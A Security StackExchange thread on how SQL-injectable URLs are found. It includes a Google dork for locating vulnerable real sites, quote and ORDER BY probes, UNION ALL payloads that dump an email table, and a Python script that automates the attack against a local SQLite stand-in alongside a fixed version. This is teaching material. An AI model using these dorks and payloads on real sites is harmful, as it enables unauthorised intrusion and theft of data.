
Over the last few days I've been reading about SQL injection, and most of the URL examples I see are like the following:

get_int_filtered.php?id=1
get_int_groupby.php?id=1
get_int_having.php?id=1
get_int_img.php?id=1
get_int_inline.php?id=SELECT+name+FROM+users

(The above is a small sample taken from sqlmapproject/testenv.)

I'm missing the part about how someone discovers these URLs to attack. Is it a manual task, for example checking the browser developer tools to see the calls to the backend / REST API of a website? Is there a tool that can scan a website and provide a list of URLs and HTTP methods to try (as a second step)?

tgogos
    The most common attempt is by examining the site in question. Automated attempts usually look for known issues in frameworks. If you are aiming to actually do this instead of just researching techniques and don't fancy yourself in an orange jumpsuit make sure the site in question allows it (or at the very least is usually friendly to bug reports). – Hector Nov 14 '17 at 11:29
  • I then presume you are looking for a web vulnerability scanner. Such questions are off-topic, and such functionality can be found in OpenVAS, Burp Suite and ZAP, for example. – Tobi Nary Nov 14 '17 at 12:31
  • Yeah, you are right. I've also found `arachni`. Do you think I should remove the question? – tgogos Nov 14 '17 at 12:46
  • @tgogos as long as the answers do not answer your question, this might be a reasonable idea. – Tobi Nary Nov 15 '17 at 08:12
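The discovery step the question asks about, as an added example that is not part of the original question or of any answer: a minimal same-origin crawler that records every link carrying a query string and every HTML form (action, method, field names), which is the enumeration that scanners such as Burp, ZAP and arachni perform at scale before testing each parameter. The site content is a constructed dict standing in for HTTP responses, the host name is a placeholder, and fetch() is a stub you would replace with a real HTTP client against a target you are authorised to test.

```python
"""Enumerate injection candidates: URLs with query parameters and HTML forms.

Added example. The 'site' is a constructed dict of path -> HTML so the script
runs offline; fetch() is a stub for a real HTTP GET.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, parse_qs

BASE = "http://w34ksite.com/"          # placeholder host, not a real target

# Constructed sample pages (not a real site): path(+query) -> HTML body.
SITE = {
    "/": ('<a href="/products.php?category=1">Category 1</a>'
          '<a href="/product.php?id=7">Item 7</a>'
          '<a href="/about.html">About</a>'
          '<a href="http://other.example/x.php?q=1">external</a>'
          '<form action="/search.php" method="post">'
          '<input name="q"><input type="submit" value="Go"></form>'),
    "/products.php?category=1": '<a href="/product.php?id=8">Item 8</a><a href="/">Home</a>',
    "/product.php?id=7": '<a href="/product.php?id=7&lang=en">English</a>',
    "/about.html": "<p>Static page, no parameters.</p>",
}


def fetch(url):
    """Stub for an HTTP GET: serves the constructed SITE pages."""
    p = urlparse(url)
    key = p.path + ("?" + p.query if p.query else "")
    return SITE.get(key, "")


class LinkFormParser(HTMLParser):
    """Collects absolute <a href> targets and <form> action/method/input names."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.links = []
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(urljoin(self.page_url, a["href"]))
        elif tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action") or self.page_url),
                          "method": (a.get("method") or "get").upper(),
                          "inputs": []}
        elif tag in ("input", "textarea", "select") and self._form is not None:
            # Named fields become request parameters; submit buttons are noise.
            if a.get("name") and (a.get("type") or "").lower() != "submit":
                self._form["inputs"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def crawl(base, max_pages=100):
    """Breadth-first, same-origin crawl. Returns (method, path, [param names])
    for every URL that carries a query string and every form found."""
    host = urlparse(base).netloc
    seen, queue, targets = set(), [base], []
    while queue and len(seen) < max_pages:
        url = queue.pop(0)
        if url in seen or urlparse(url).netloc != host:
            continue                      # skip revisits and off-site links
        seen.add(url)
        parser = LinkFormParser(url)
        parser.feed(fetch(url))
        p = urlparse(url)
        if p.query:                       # e.g. product.php?id=7 -> GET /product.php [id]
            targets.append(("GET", p.path, sorted(parse_qs(p.query, keep_blank_values=True))))
        for f in parser.forms:
            targets.append((f["method"], urlparse(f["action"]).path, sorted(f["inputs"])))
        queue.extend(parser.links)
    unique = []
    for t in targets:                     # keep first occurrence, drop duplicates
        if t not in unique:
            unique.append(t)
    return unique


if __name__ == "__main__":
    for method, path, params in crawl(BASE):
        print(method, path, ",".join(params))
```

Each tuple the crawler returns is one thing to test in the second step (the single-quote probe, ORDER BY, a scanner). Static pages without parameters, such as about.html, never appear in the list, and off-site links are not followed.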

1 Answer


SQL injection: how to find URLs weak to SQL injection attacks.

First, you have to understand the different types of SQLi, here.

I will speak here about in-band injection, the classic one, divided into 2 types:

  • Error based SQLi
  • UNION based SQLi

Error Based SQLI

Goal: gathering database structure information by displaying SQL errors on the target website. In some cases, you can enumerate the entire database with those.

Finding a weak URL: using Google dorks. Yes, Google helps you find weak URLs.

  • example: inurl:"product.php?id=" site:.ru

Here you are asking Google to list Russian sites with product.php?id= in the URL.

Why?

Because we want to find a page which is directly talking to the database. In most cases you want to search for these patterns: *.php?parameter=n

Alright, but how do I know this URL is weak to SQLi?

You have to put a ' or %27 just after the parameter's number and press Enter:

  • http[:]//w34ksite.com/product.php?id=1'

If an SQL error appears, there is some probability that this website is injectable.

UNION Based SQLI

Goal: leverage the UNION SQL operator to combine the results of two or more SELECT statements into a single result.

The following block is material I wrote for my InfoSec students (offensive security class).

weak site:

http://w34ksite.com

The first step

Find a URL that potentially sends SQL queries, like this one:

http://w34ksite.com/products.php?category=1 This URL lists products, grouped in the category named 1.

Try to remember that a URL ending with * ? * = * will, in most cases, communicate with an SQL database; we want to exploit this.

The second step

Translate the products.php?category=1 part of the URL into an SQL query. Yes, in this scenario (and on a lot of websites in production) this piece of the URL is a disguised SQL query:

products.php?category=1 --> SELECT * FROM products WHERE category=1

The third step

Can we inject the category parameter? Let's try to sort the products list by adding ORDER BY n, for instance:

http://w34ksite.com/products.php?category=1 ORDER BY 1 Nothing changes.

http://w34ksite.com/products.php?category=1 ORDER BY 2 Wow! The product order has changed! We can probably inject stuff!

The number n in ORDER BY n indicates which column number of the table you are sorting the output by (in this case column 2 of the products table). So wait a minute, what happens if I input a number that exceeds the table's maximum column number? Let's try it out.

http://w34ksite.com/products.php?category=1 ORDER BY 3 Order changes again.

http://w34ksite.com/products.php?category=1 ORDER BY 4 Wow! Blank page! We can deduce that the products table has 3 columns. This info is crucial for using the SQL UNION ALL operator.

The fourth step

Planning the attack. So, for example, we want to dump email addresses stored in this database. And of course, the email entries are not in the products table. They should be elsewhere... You can guess table names and more when SQL errors appear directly on the web page, but no luck this time: no SQL error appears on w34ksite.com. So let's assume the email table is named email, because we know this is this CMS's default email table name.

SELECT * FROM email --> http://w34ksite.com/email.php? Of course not. Who would be crazy enough to create a PHP page that lists the database's emails? Why not password.php?

Don't forget that products.php?category=1 is our key to communicate with the database and inject things. This key opens the database door; the general idea will be to use this key to display the content of the email table. So why not display the products table content (products.php?category=1) and the email table content together? Yes, this is what we will do, by using the UNION ALL operator.

UNION ALL is quite useful: you can append another SQL query by using it. For instance, let's translate this URL part into SQL again:

products.php?category=1 --> SELECT * FROM products WHERE category=1 right?

We will now add the new query by using the UNION ALL operator and try to fetch the email table:

SELECT * FROM products WHERE category=1 UNION ALL SELECT *, NULL, NULL FROM email

We should have something like this:

http://w34ksite.com/products.php?category=1 UNION ALL SELECT *, NULL, NULL FROM email

Wait, what is the *, NULL, NULL?

Remember the http://w34ksite.com/products.php?category=1 ORDER BY 4 for testing whether we can inject things? We got a very valuable piece of information: the number of columns the products table has. When using the UNION ALL operator, the column count has to be the same.

  • NULL: fakes an empty column.
  • , : separates one column from another.
  • * : displays the entries of this column.

If nothing happens, try to move the * around like this:

http://w34ksite.com/products.php?category=1 UNION ALL SELECT *, NULL, NULL FROM email

http://w34ksite.com/products.php?category=1 UNION ALL SELECT NULL, *, NULL FROM email

http://w34ksite.com/products.php?category=1 UNION ALL SELECT NULL, NULL, * FROM email

Baptiste
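The third and fourth steps of the answer (counting columns with ORDER BY n, then appending a UNION ALL SELECT with NULL padding) carried out end to end, as an added example that is not part of the answer above. It runs against an in-memory SQLite database that stands in for the PHP page and its backend; the products and email tables, their rows, and the two page functions are constructed for the example. vulnerable_page() splices the parameter into the query string exactly the way the answer assumes products.php does, and fixed_page() shows the same page with the parameter validated and bound, so the same probes can be run against both.

```python
"""Reproduce the ORDER BY / UNION ALL walk-through against a local SQLite
database. Added example: the tables, rows and page functions are constructed
stand-ins for products.php and its MySQL backend."""
import sqlite3


def build_db():
    """Constructed schema: a 3-column products table and a separate email table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, category INTEGER);
        INSERT INTO products VALUES (1, 'apple', 1), (2, 'pear', 1), (3, 'brick', 2);
        CREATE TABLE email(id INTEGER, address TEXT);
        INSERT INTO email VALUES (1, 'alice@example.org'), (2, 'bob@example.org');
    """)
    return con


def vulnerable_page(con, category):
    """products.php?category=<category> as the answer assumes it is written:
    the parameter is pasted into the SQL string. Errors are swallowed, so the
    attacker sees a blank page (None) instead of an error message."""
    sql = "SELECT * FROM products WHERE category=" + category
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def fixed_page(con, category):
    """Same page with the parameter validated and bound; no string splicing."""
    try:
        cat = int(category)
    except ValueError:
        return None
    return con.execute("SELECT * FROM products WHERE category=?", (cat,)).fetchall()


def count_columns(page, max_cols=32):
    """Third step: ORDER BY n works while n <= column count; the first n that
    blanks the page gives count = n - 1. Returns 0 if even ORDER BY 1 fails."""
    for n in range(1, max_cols + 1):
        if page("1 ORDER BY %d" % n) is None:
            return n - 1
    return None


def union_dump(page, ncols, table, column):
    """Fourth step: UNION ALL a SELECT with exactly ncols columns, the wanted
    column in one slot and NULL in the others, trying each slot in turn
    (the answer's 'move the * around'). Returns (slot, values) or None."""
    baseline = page("1") or []
    for slot in range(ncols):
        cols = ["NULL"] * ncols
        cols[slot] = column
        payload = "1 UNION ALL SELECT %s FROM %s" % (", ".join(cols), table)
        rows = page(payload)
        if rows is None:
            continue
        extra = [r for r in rows if r not in baseline]   # rows that came from `table`
        if extra:
            return slot, [r[slot] for r in extra]
    return None


if __name__ == "__main__":
    con = build_db()
    weak = lambda s: vulnerable_page(con, s)
    n = count_columns(weak)
    print("columns:", n)                                  # 3
    print(union_dump(weak, n, "email", "address"))        # (0, ['alice@example.org', 'bob@example.org'])
    safe = lambda s: fixed_page(con, s)
    print(count_columns(safe), union_dump(safe, 3, "email", "address"))   # 0 None
```

Against vulnerable_page the probe finds 3 columns and the UNION payload returns both addresses in slot 0; against fixed_page the very first ORDER BY probe is rejected by int(), so count_columns() reports 0 and no UNION payload gets through. The injected SELECT names a column (address) rather than using *, so that its column count is exactly the number found in the third step; SQLite, like MySQL, refuses the UNION when the two sides differ.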